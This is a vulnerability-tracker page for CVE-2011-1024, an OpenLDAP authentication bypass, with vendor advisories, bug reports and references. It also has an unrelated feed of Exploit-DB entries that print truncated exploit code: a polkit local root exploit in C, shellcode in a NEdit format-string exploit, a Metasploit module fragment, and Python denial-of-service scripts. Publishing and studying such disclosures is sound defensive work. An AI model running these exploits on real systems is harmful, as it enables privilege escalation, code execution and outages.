CVE-2011-1024
published 2011-03-20CVE-2011-1024: chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24, when a master-slave configuration with a chain overlay and ppolicy_forward_updates (aka…
PriorityP432medium4.6CVSS 2.0
AVNACHAuSCPIPAP
EPSS
2.96%
85.7th percentile
chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24, when a master-slave configuration with a chain overlay and ppolicy_forward_updates (aka authentication-failure forwarding) is used, allows remote authenticated users to bypass external-program authentication by sending an invalid password to a slave server.
Affected
23 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | openldap | < openldap 2.4.25-1 (bookworm) | openldap 2.4.25-1 (bookworm) |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | — | — |
| openldap | openldap | >= 0 < 2.4.25-1 | 2.4.25-1 |
| openldap | openldap | >= 0 < 2.4.25-1 | 2.4.25-1 |
| openldap | openldap | >= 0 < 2.4.25-1 | 2.4.25-1 |
| openldap | openldap | >= 0 < 2.4.25-1 | 2.4.25-1 |
CVSS provenance
nvdv2.04.6MEDIUMAV:N/AC:H/Au:S/C:P/I:P/A:P
osv4.6MEDIUM
vendor_debian4.6LOW
vendor_redhat4.6MEDIUM
vendor_ubuntu4.6MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
OpenLDAP vulnerabilities
vendor_ubuntu·2011-03-31·CVSS 4.6
CVE-2011-1025 [MEDIUM] OpenLDAP vulnerabilities
Title: OpenLDAP vulnerabilities
Summary: An attacker could send crafted input to OpenLDAP and cause it to crash.
It was discovered that OpenLDAP did not properly check forwarded
authentication failures when using a consumer server and chain overlay. If
OpenLDAP were configured in this manner, an attacker could bypass
authentication checks by sending an invalid password to a consumer server.
(CVE-2011-1024)
It was discovered that OpenLDAP did not properly perform authentication
checks to the rootdn when using the back-ndb backend. An attacker could
exploit this to access the directory by sending an arbitrary password.
Ubuntu does not ship OpenLDAP with back-ndb support by default. This issue
did not affect Ubuntu 8.04 LTS. (CVE-2011-1025)
It was discovered that OpenLDAP did not properly
Debian
CVE-2011-1024: openldap - chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24, when a master-slave config...
vendor_debian·2011·CVSS 4.6
CVE-2011-1024 [MEDIUM] CVE-2011-1024: openldap - chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24, when a master-slave config...
chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24, when a master-slave configuration with a chain overlay and ppolicy_forward_updates (aka authentication-failure forwarding) is used, allows remote authenticated users to bypass external-program authentication by sending an invalid password to a slave server.
Scope: local
bookworm: resolved (fixed in 2.4.25-1)
bullseye: resolved (fixed in 2.4.25-1)
forky: resolved (fixed in 2.4.25-1)
sid: resolved (fixed in 2.4.25-1)
trixie: resolved (fixed in 2.4.25-1)
Red Hat
openldap: forwarded bind failure messages cause success
vendor_redhat·2010-07-28·CVSS 4.6
CVE-2011-1024 [MEDIUM] openldap: forwarded bind failure messages cause success
openldap: forwarded bind failure messages cause success
chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24, when a master-slave configuration with a chain overlay and ppolicy_forward_updates (aka authentication-failure forwarding) is used, allows remote authenticated users to bypass external-program authentication by sending an invalid password to a slave server.
Package: openldap (Red Hat Enterprise Linux 4) - Not affected
GHSA
GHSA-v9w5-g35w-fmjv: chain
ghsa_unreviewed·2022-05-17
CVE-2011-1024 [MEDIUM] GHSA-v9w5-g35w-fmjv: chain
chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24, when a master-slave configuration with a chain overlay and ppolicy_forward_updates (aka authentication-failure forwarding) is used, allows remote authenticated users to bypass external-program authentication by sending an invalid password to a slave server.
OSV
CVE-2011-1024: chain
osv·2011-03-20·CVSS 4.6
CVE-2011-1024 [MEDIUM] CVE-2011-1024: chain
chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24, when a master-slave configuration with a chain overlay and ppolicy_forward_updates (aka authentication-failure forwarding) is used, allows remote authenticated users to bypass external-program authentication by sending an invalid password to a slave server.
No detection rules found.
Exploit-DB
CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)
exploitdb·2011-11-30
CVE-2011-5010 CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)
CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'CTEK SkyRouter 4200 and 4300 Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.
},
'Author' => [ 'savant42' ], #with module help from kos
'License' => MSF_LICENSE,
'References' => [ 'URL', 'http://dev.metasploit.com/redmine/issues/5610'],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd'
Exploit-DB
PolicyKit polkit-1 < 0.101 - Local Privilege Escalation
exploitdb·2011-10-05·CVSS 6.9
CVE-2011-1485 [MEDIUM] PolicyKit polkit-1 < 0.101 - Local Privilege Escalation
PolicyKit polkit-1
#include
#include
#include
#include
#include
int main(int argc, char **argv)
{
printf("=============================\n");
printf("= PolicyKit Pwnage =\n");
printf("= by zx2c4 =\n");
printf("= Sept 2, 2011 =\n");
printf("=============================\n\n");
if (fork()) {
int fd;
char pid_path[1024];
sprintf(pid_path, "/proc/%i", getpid());
printf("[+] Configuring inotify for proper pid.\n");
close(0); close(1); close(2);
fd = inotify_init();
if (fd < 0)
perror("[-] inotify_init");
inotify_add_watch(fd, pid_path, IN_ACCESS);
read(fd, NULL, 0);
execl("/usr/bin/chsh", "chsh", NULL);
} else {
sleep(1);
printf("[+] Launching pkexec.\n");
execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
}
return 0;
}
Exploit-DB
Simple HTTPd 1.42 - Denial of Servive
exploitdb·2011-08-12
CVE-2011-2900 Simple HTTPd 1.42 - Denial of Servive
Simple HTTPd 1.42 - Denial of Servive
---
#!/usr/bin/python
# Exploit Title: Simple HTTPd 1.42 PoC DoS
# Date: 8/10/2011
# Author: G13
# Software Link:
http://sourceforge.net/projects/shttpd/files/shttpd/1.42/shttpd-1.42.tar.gz/download
# Version: 1.42
# Tested on: WinXP SP1
# CVE : 2011-2900
#
# Since Mongoose HTTPd and Simple HTTPd share similar code, the exploit
still works.
# Simple HTTPd is still affected by the bug. The executable must be
compiled with -DNO_AUTH and -D_DEBUG enabled. I compiled
# under MinGW.
import socket, sys
buf = "A" * 6000
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.101',80))
s.send("PUT /" + buf + "/ HTTP/1.0\r\n")
s.send("\r\n")
print s.recv(1024)
s.close()
Exploit-DB
Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities
exploitdb·2011-06-17
CVE-2011-2960 Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities
Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities
---
source: https://www.securityfocus.com/bid/48328/info
Sunway ForceControl is prone to multiple heap-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit these issues to execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition.
def send(packet)
begin
sock = TCPSocket.new(@ip, @port)
sock.write(packet)
rescue Exception => e
return false
else
resp = sock.recv(1024)
sock.close
return true
end
end
@ip = ARGV[0]
@port = 80
# windows/exec CMD=calc.exe
shellcode = "\xb8\xd5\x45\x06\xc4\xda\xde\xd9\x74\x24\xf4\x5b\x33\xc9" +
"\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x3
Exploit-DB
iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash
exploitdb·2011-05-31
iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash
iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash
---
# Exploit Title: iPhone4 FTP Server V1.0 - Empty CWD-RETR Remote Crash
# Date: 2011-05-30
# Author: offsetIntruder
# Software Link: http://itunes.apple.com/us/app/ftp-server/id356055128?mt=8
# Version: 1.0
# Tested on: iPhone4 IOS 4.3.2
# CVE: N/A
import socket
import sys
user="anonymous"
print("\n iPhone4 FTP Server By Zhang Boyang - Empty CWD-RETR Remote Crash\n")
def ExploitFTP(target):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,2121))
data = s.recv(1024)
print("[+] Sending user login...")
s.send("USER " + user + '\r\n')
data = s.recv(1024)
print("[+] Sending empty CWD...\n")
s.send("CWD \r\n")
data = s.recv(1024)
s.close()
target = sys.argv[1]
ExploitFTP(target)
Exploit-DB
NEdit 5.5 - Format String
exploitdb·2011-04-14
NEdit 5.5 - Format String
NEdit 5.5 - Format String
---
# Exploit Title: Format string vulnerability in Nedit <= 5.5.
# Date: 04/13/2011
# Author: Tosh (The bug was already patched when I'd found the vuln)
# Email: [email protected]
# Patch:
http://nedit.cvs.sourceforge.net/viewvc/nedit/nedit/source/preferences.c?r1=1.159&r2=1.160&view=patch
# Version: Nedit 5.5
# Tested on: FreeBSD 8.2-RELEASE
# CVE: don't found
#!/usr/bin/perl -w
use strict;
my $exit_addr = 0x0815a86c;
my $sc =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
"\x54\x53\xb0\x3b\x50\xcd\x80";
my (@payload) = ("./nedit", "-import",
pack('L',$exit_addr).pack('L',$exit_addr+1).pack('L',$exit_addr+2).pack('L',$exit_addr+3).
"%1021\$.8x-"."%1\$127x%1021\$n%1\$083x%1022\$n%1\$212x%1023\$n%1\$256x%1024\$n"
. $sc);
exec(@paylo
Exploit-DB
PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Denial of Service
exploitdb·2011-03-10
CVE-2011-1471 PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Denial of Service
PHP open('test.zip',ZipArchive::CHECKCONS)) {
exit ('error can\'t open');
}
$o->getStream('file2'); // this file is ok
echo "OK";
$r = $o->getStream('file1'); // this file has a wrong crc
while (! feof($r)) {
fread($r,1024);
}
echo "never here\n";
?>
Exploit-DB
Blackmoon FTP 3.1 Build 1735/1736 - Denial of Service
exploitdb·2011-01-13
CVE-2011-0507 Blackmoon FTP 3.1 Build 1735/1736 - Denial of Service
Blackmoon FTP 3.1 Build 1735/1736 - Denial of Service
---
#!/usr/bin/python
# Exploit Title: BlackmoonFTP Server DOS
# Date: 12/28/2010
# Author: Craig Freyman (cd1zz)
# Software Link: http://www.mediafire.com/?bnc4d00myymmx55
# Version: 3.1 Release 6 - Build 1735 and 1736
# Tested On: Windows XP SP3
# Vendor Contacted: 12/28/2010
# Vendor Fixed: 1/13/2011
import socket
import sys
buffer = '\x41' * 600
counter = 1
if len(sys.argv) != 3:
print "Usage: ./blackmoonDOS.py "
sys.exit()
ip = sys.argv[1]
port = sys.argv[2]
while counter <= 300:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "[*] Sending evil buffer. Count " + str(counter) + " out of 300"
s.connect((ip,int(port)))
s.recv(1024)
s.send('PORT ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT \r\n')
s.recv(1024
Bugzilla
CVE-2011-1024 openldap: forwarded bind failure messages cause success
bugzilla·2011-02-25·CVSS 4.6
CVE-2011-1024 [MEDIUM] CVE-2011-1024 openldap: forwarded bind failure messages cause success
CVE-2011-1024 openldap: forwarded bind failure messages cause success
It was reported [1],[2],[3] that in certain configurations, OpenLDAP would authenticate with an invalid password. If an OpenLDAP slave received an authenticated bind request with an invalid password that was forwarded to the master LDAP server, the LDAP slave would return a successful bind (as an anonymous user) rather than return a failure (as the user to authenticate). This is due to a chain overlay being set on the frontend, with a ppolicy configured with ppolicy_forward_updates. While this is not a security issue regarding LDAP contents, due to the authentication as an unprivileged anonymous user, when LDAP returns a successful bind to other external programs (such as programs performing authentication, such as pam_
Bugzilla
CVE-2011-1024 CVE-2011-1025 openldap various flaws [fedora-all]
bugzilla·2011-02-25·CVSS 4.6
CVE-2011-1024 [MEDIUM] CVE-2011-1024 CVE-2011-1025 openldap various flaws [fedora-all]
CVE-2011-1024 CVE-2011-1025 openldap various flaws [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=680466
Please note: this issue affects multiple supported
Bugzilla
CVE-2011-0719 Samba unsafe fd_set usage
bugzilla·2011-02-17·CVSS 5.0
CVE-2011-0719 [MEDIUM] CVE-2011-0719 Samba unsafe fd_set usage
CVE-2011-0719 Samba unsafe fd_set usage
A flaw was found in the way Samba handles the file descriptor sets (fd_set)
datastructure.
The Samba codebase uses file descriptor sets in various places. The fd_set
structure is a fixed size defined by the FD_SETSIZE variable. If a file
descriptor with a value greater than or equal to FD_SETSIZE is added to a
set, it can set a single bit on the stack to a '1'.
In Red Hat Enterprise Linux, all samba processes except for smbd have a
limit set which prevents a process from allocating more than 1024 file
descriptors by default. 1024 is the value of FD_SETSIZE on Red Hat
Enterprise Linux.
smbd does not cap the maximum allowed file descriptors below 1024. This
means that if a remote attacker has the ability to open files on a Samba
server, they may be
http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10705http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10735http://openwall.com/lists/oss-security/2011/02/24/12http://openwall.com/lists/oss-security/2011/02/25/13http://secunia.com/advisories/43331http://secunia.com/advisories/43708http://secunia.com/advisories/43718http://security.gentoo.org/glsa/glsa-201406-36.xmlhttp://securitytracker.com/id?1025188http://www.mandriva.com/security/advisories?name=MDVSA-2011:055http://www.mandriva.com/security/advisories?name=MDVSA-2011:056http://www.openldap.org/devel/cvsweb.cgi/servers/slapd/back-ldap/chain.c.diff?r1=1.76&r2=1.77&hideattic=1&sortbydate=0http://www.openldap.org/its/index.cgi/Software%20Bugs?id=6607http://www.openldap.org/lists/openldap-announce/201102/msg00000.htmlhttp://www.openldap.org/lists/openldap-technical/201004/msg00247.htmlhttp://www.redhat.com/support/errata/RHSA-2011-0346.htmlhttp://www.redhat.com/support/errata/RHSA-2011-0347.htmlhttp://www.ubuntu.com/usn/USN-1100-1http://www.vupen.com/english/advisories/2011/0665https://bugzilla.novell.com/show_bug.cgi?id=674985https://bugzilla.redhat.com/show_bug.cgi?id=680466http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10705http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10735http://openwall.com/lists/oss-security/2011/02/24/12http://openwall.com/lists/oss-security/2011/02/25/13http://secunia.com/advisories/43331http://secunia.com/advisories/43708http://secunia.com/advisories/43718http://security.gentoo.org/glsa/glsa-201406-36.xmlhttp://securitytracker.com/id?1025188http://www.mandriva.com/security/advisories?name=MDVSA-2011:055http://www.mandriva.com/security/advisories?name=MDVSA-2011:056http://www.openldap.org/devel/cvsweb.cgi/servers/slapd/back-ldap/chain.c.diff?r1=1.76&r2=1.77&hideattic=1&sortbydate=0http://www.openldap.org/its/index.cgi/Software%20Bugs?id=6607http://www.openldap.org/lists/openldap-announce/201102/msg00000.htmlhttp://www.openldap.org/lists/openldap-technical/201004/msg00247.htmlhttp://www.redhat.com/support/errata/RHSA-2011-0346.htmlhttp://www.redhat.com/support/errata/RHSA-2011-0347.htmlhttp://www.ubuntu.com/usn/USN-1100-1http://www.vupen.com/english/advisories/2011/0665https://bugzilla.novell.com/show_bug.cgi?id=674985https://bugzilla.redhat.com/show_bug.cgi?id=680466
2011-03-20
Published